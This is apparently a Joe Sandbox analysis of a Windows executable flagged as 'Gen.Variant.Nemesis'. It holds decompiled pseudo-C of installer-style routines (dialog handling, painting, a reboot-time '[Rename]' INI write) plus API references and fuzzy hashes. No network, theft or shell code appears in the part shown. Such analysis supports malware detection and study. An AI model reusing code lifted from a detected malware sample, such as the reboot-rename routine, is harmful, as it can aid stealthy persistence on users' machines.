                                                                                                                        							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                                        							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                                        							_v12 = _t103;
                                                                                                                        							_v16 = _t113;
                                                                                                                        							_v8 = 0x432ea0;
                                                                                                                        							if(_t103 - _t113 < 0x800) {
                                                                                                                        								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                                        								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                                                        								_push(1);
                                                                                                                        								E00404907(_a4, _v8);
                                                                                                                        								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                                        								_t114 = _a16;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                                        							goto L28;
                                                                                                                        						} else {
                                                                                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                                        								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                                                                        							}
                                                                                                                        							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                                        								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                                                                        							}
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                                                                        						goto L27;
                                                                                                                        					} else {
                                                                                                                        						_t69 =  *0x42c240; // 0x6bdacc
                                                                                                                        						_t29 = _t69 + 0x14; // 0x6bdae0
                                                                                                                        						_t116 = _t29;
                                                                                                                        						if(( *_t116 & 0x00000020) == 0) {
                                                                                                                        							goto L27;
                                                                                                                        						}
                                                                                                                        						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                        						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                        						E004048E3();
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t117 = _a16;
                                                                                                                        				_t75 =  *(_t117 + 0x30);
                                                                                                                        				if(_t75 < 0) {
                                                                                                                        					_t111 =  *0x433edc; // 0x6c3640
                                                                                                                        					_t75 =  *(_t111 - 4 + _t75 * 4);
                                                                                                                        				}
                                                                                                                        				_t76 =  *0x434f38 + _t75 * 2;
                                                                                                                        				_t110 =  *_t76 & 0x0000ffff;
                                                                                                                        				_a8 = _t110;
                                                                                                                        				_t78 =  &(_t76[1]);
                                                                                                                        				_a16 = _t78;
                                                                                                                        				_v16 = _t78;
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v8 = E00404609;
                                                                                                                        				if(_t110 != 2) {
                                                                                                                        					_v8 = E004045CF;
                                                                                                                        				}
                                                                                                                        				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                                        				_push(0x22);
                                                                                                                        				E00404499(_a4);
                                                                                                                        				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                                        				_push(0x23);
                                                                                                                        				E00404499(_a4);
                                                                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                        				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                                        				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                                        				E004044CE(_t118);
                                                                                                                        				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                                                        				_t92 =  *( *0x434f10 + 0x68);
                                                                                                                        				if(_t92 < 0) {
                                                                                                                        					_t92 = GetSysColor( ~_t92);
                                                                                                                        				}
                                                                                                                        				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                                        				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                                        				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                                        				 *0x42b234 = 0;
                                                                                                                        				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                                        				 *0x42b234 = 0;
                                                                                                                        				return 0;
                                                                                                                        			}





















                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                        • GetSysColor.USER32(?), ref: 00404738
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                        • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                        • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                        • String ID: @6l$Call$N
                                                                                                                        • API String ID: 3103080414-3783438084
                                                                                                                        • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                        • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                        • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                        • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                        				struct tagLOGBRUSH _v16;
                                                                                                                        				struct tagRECT _v32;
                                                                                                                        				struct tagPAINTSTRUCT _v96;
                                                                                                                        				struct HDC__* _t70;
                                                                                                                        				struct HBRUSH__* _t87;
                                                                                                                        				struct HFONT__* _t94;
                                                                                                                        				long _t102;
                                                                                                                        				signed int _t126;
                                                                                                                        				struct HDC__* _t128;
                                                                                                                        				intOrPtr _t130;
                                                                                                                        
                                                                                                                        				if(_a8 == 0xf) {
                                                                                                                        					_t130 =  *0x434f10;
                                                                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                        					_a8 = _t70;
                                                                                                                        					GetClientRect(_a4,  &_v32);
                                                                                                                        					_t126 = _v32.bottom;
                                                                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                        					while(_v32.top < _t126) {
                                                                                                                        						_a12 = _t126 - _v32.top;
                                                                                                                        						asm("cdq");
                                                                                                                        						asm("cdq");
                                                                                                                        						asm("cdq");
                                                                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                                                                        						_a16 = _t87;
                                                                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                                                                        						DeleteObject(_a16);
                                                                                                                        						_v32.top = _v32.top + 4;
                                                                                                                        					}
                                                                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                        						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                                        						_a16 = _t94;
                                                                                                                        						if(_t94 != 0) {
                                                                                                                        							_t128 = _a8;
                                                                                                                        							_v32.left = 0x10;
                                                                                                                        							_v32.top = 8;
                                                                                                                        							SetBkMode(_t128, 1);
                                                                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                                                                        							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                                                                        							SelectObject(_t128, _a8);
                                                                                                                        							DeleteObject(_a16);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					EndPaint(_a4,  &_v96);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t102 = _a16;
                                                                                                                        				if(_a8 == 0x46) {
                                                                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                                                                        				}
                                                                                                                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: F
                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                        • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                        • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                        • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                        • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406183(void* __ecx) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				long _t12;
                                                                                                                        				long _t24;
                                                                                                                        				char* _t31;
                                                                                                                        				int _t37;
                                                                                                                        				void* _t38;
                                                                                                                        				intOrPtr* _t39;
                                                                                                                        				long _t42;
                                                                                                                        				WCHAR* _t44;
                                                                                                                        				void* _t46;
                                                                                                                        				void* _t48;
                                                                                                                        				void* _t49;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t53;
                                                                                                                        
                                                                                                                        				_t38 = __ecx;
                                                                                                                        				_t44 =  *(_t52 + 0x14);
                                                                                                                        				 *0x430908 = 0x55004e;
                                                                                                                        				 *0x43090c = 0x4c;
                                                                                                                        				if(_t44 == 0) {
                                                                                                                        					L3:
                                                                                                                        					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                                                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                        						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                                                                                                        						_t53 = _t52 + 0x10;
                                                                                                                        						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                                                                                                        						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                                                                                                        						_t48 = _t12;
                                                                                                                        						 *(_t53 + 0x18) = _t48;
                                                                                                                        						if(_t48 != 0xffffffff) {
                                                                                                                        							_t42 = GetFileSize(_t48, 0);
                                                                                                                        							_t6 = _t37 + 0xa; // 0xa
                                                                                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                        							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                                                                                                        								L18:
                                                                                                                        								return CloseHandle(_t48);
                                                                                                                        							} else {
                                                                                                                        								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                        									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                                                                                                        									if(_t49 == 0) {
                                                                                                                        										_t48 =  *(_t53 + 0x18);
                                                                                                                        										L16:
                                                                                                                        										_t24 = _t42;
                                                                                                                        										L17:
                                                                                                                        										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                                                                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                        										E004060DF(_t48, _t46, _t42 + _t37);
                                                                                                                        										GlobalFree(_t46);
                                                                                                                        										goto L18;
                                                                                                                        									}
                                                                                                                        									_t39 = _t46 + _t42;
                                                                                                                        									_t31 = _t39 + _t37;
                                                                                                                        									while(_t39 > _t49) {
                                                                                                                        										 *_t31 =  *_t39;
                                                                                                                        										_t31 = _t31 - 1;
                                                                                                                        										_t39 = _t39 - 1;
                                                                                                                        									}
                                                                                                                        									_t24 = _t49 - _t46 + 1;
                                                                                                                        									_t48 =  *(_t53 + 0x18);
                                                                                                                        									goto L17;
                                                                                                                        								}
                                                                                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                        								_t42 = _t42 + 0xa;
                                                                                                                        								goto L16;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					CloseHandle(E0040602D(_t44, 0, 1));
                                                                                                                        					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                        						goto L3;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t12;
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                          • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                          • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                        • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                        • wsprintfA.USER32 ref: 00406202
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                          • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                          • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                        • String ID: %ls=%ls$[Rename]
                                                                                                                        • API String ID: 2171350718-461813615
                                                                                                                        • Opcode ID: 6dbc896bee28fc2cd17c6beb7c7e3b01e9a95bb407788db3ff507c40593cf796
                                                                                                                        • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                        • Opcode Fuzzy Hash: 6dbc896bee28fc2cd17c6beb7c7e3b01e9a95bb407788db3ff507c40593cf796
                                                                                                                        • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                        				struct tagLOGBRUSH _v16;
                                                                                                                        				long _t39;
                                                                                                                        				long _t41;
                                                                                                                        				void* _t44;
                                                                                                                        				signed char _t50;
                                                                                                                        				long* _t54;
                                                                                                                        
                                                                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                                                                        					L18:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                        					goto L18;
                                                                                                                        				} else {
                                                                                                                        					_t50 = _t54[5];
                                                                                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                        						goto L18;
                                                                                                                        					}
                                                                                                                        					_t39 =  *_t54;
                                                                                                                        					if((_t50 & 0x00000002) != 0) {
                                                                                                                        						_t39 = GetSysColor(_t39);
                                                                                                                        					}
                                                                                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                        						SetTextColor(_a8, _t39);
                                                                                                                        					}
                                                                                                                        					SetBkMode(_a8, _t54[4]);
                                                                                                                        					_t41 = _t54[1];
                                                                                                                        					_v16.lbColor = _t41;
                                                                                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                        						_t41 = GetSysColor(_t41);
                                                                                                                        						_v16.lbColor = _t41;
                                                                                                                        					}
                                                                                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                        						SetBkColor(_a8, _t41);
                                                                                                                        					}
                                                                                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                        						_v16.lbStyle = _t54[2];
                                                                                                                        						_t44 = _t54[3];
                                                                                                                        						if(_t44 != 0) {
                                                                                                                        							DeleteObject(_t44);
                                                                                                                        						}
                                                                                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                        					}
                                                                                                                        					return _t54[3];
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                        • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                        • GetSysColor.USER32(?), ref: 00404586
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                        • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                        • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                        • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				intOrPtr _t66;
                                                                                                                        				intOrPtr _t72;
                                                                                                                        				void* _t76;
                                                                                                                        				void* _t79;
                                                                                                                        
                                                                                                                        				_t72 = __edx;
                                                                                                                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                                        				_t65 = 2;
                                                                                                                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                                                        				_t66 = E00402D84(_t65);
                                                                                                                        				_t79 = _t66 - 1;
                                                                                                                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                                                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                                                        				if(_t79 < 0) {
                                                                                                                        					L36:
                                                                                                                        					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                                                                                        				} else {
                                                                                                                        					__ecx = 0x3ff;
                                                                                                                        					if(__eax > 0x3ff) {
                                                                                                                        						 *(__ebp - 0x44) = 0x3ff;
                                                                                                                        					}
                                                                                                                        					if( *__edi == __bx) {
                                                                                                                        						L34:
                                                                                                                        						__ecx =  *(__ebp - 0xc);
                                                                                                                        						__eax =  *(__ebp - 8);
                                                                                                                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                                        						if(_t79 == 0) {
                                                                                                                        							 *(_t76 - 4) = 1;
                                                                                                                        						}
                                                                                                                        						goto L36;
                                                                                                                        					} else {
                                                                                                                        						 *(__ebp - 0x38) = __ebx;
                                                                                                                        						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                                                                                                        						if( *(__ebp - 0x44) > __ebx) {
                                                                                                                        							do {
                                                                                                                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                                                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                                                        										__eax = __ebp - 0x50;
                                                                                                                        										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                                                        											goto L34;
                                                                                                                        										} else {
                                                                                                                        											goto L21;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										goto L34;
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									__eax = __ebp - 0x40;
                                                                                                                        									_push(__ebx);
                                                                                                                        									_push(__ebp - 0x40);
                                                                                                                        									__eax = 2;
                                                                                                                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                                                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                                                        									if(__eax == 0) {
                                                                                                                        										goto L34;
                                                                                                                        									} else {
                                                                                                                        										__ecx =  *(__ebp - 0x40);
                                                                                                                        										if(__ecx == __ebx) {
                                                                                                                        											goto L34;
                                                                                                                        										} else {
                                                                                                                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x4c) = __ecx;
                                                                                                                        											 *(__ebp - 0x50) = __eax;
                                                                                                                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                        												L28:
                                                                                                                        												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                                        											} else {
                                                                                                                        												__ebp - 0x50 = __ebp + 0xa;
                                                                                                                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                                                        													L21:
                                                                                                                        													__eax =  *(__ebp - 0x50);
                                                                                                                        												} else {
                                                                                                                        													__edi =  *(__ebp - 0x4c);
                                                                                                                        													__edi =  ~( *(__ebp - 0x4c));
                                                                                                                        													while(1) {
                                                                                                                        														_t22 = __ebp - 0x40;
                                                                                                                        														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                                                        														__eax = 0xfffd;
                                                                                                                        														 *(__ebp - 0x50) = 0xfffd;
                                                                                                                        														if( *_t22 == 0) {
                                                                                                                        															goto L22;
                                                                                                                        														}
                                                                                                                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
